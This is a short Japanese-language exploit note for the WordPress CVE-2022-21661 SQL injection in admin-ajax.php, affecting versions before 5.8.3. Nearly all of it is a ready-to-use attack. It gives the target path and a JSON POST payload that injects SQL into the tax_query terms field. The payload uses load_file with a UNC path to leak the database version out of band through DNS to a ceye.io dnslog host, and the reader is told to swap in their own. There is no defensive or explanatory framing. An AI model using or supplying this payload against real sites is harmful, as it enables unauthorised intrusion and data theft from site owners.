
WordPress CVE-2022-21661のadmin-ajax.phpのSQLインジェクション脆弱性のエクスプロイト。5.8.3未満のバージョンで、DNSを介した帯域外データ流出を使用します。
#version<5.8.3
パス:http://your target/wp-admin/admin-ajax.php
インジェクションタイプはout-of-bandです。dnslogを自分で指定し、ceye.ioを置き換える必要があります。
POST データ:{"tax_query":[{"field":"term_taxonomy_id","terms":["1) and if((select load_file(concat('\\',(select version()),'.27s601.ceye.io\abc'))),1,1)-- a"]}]}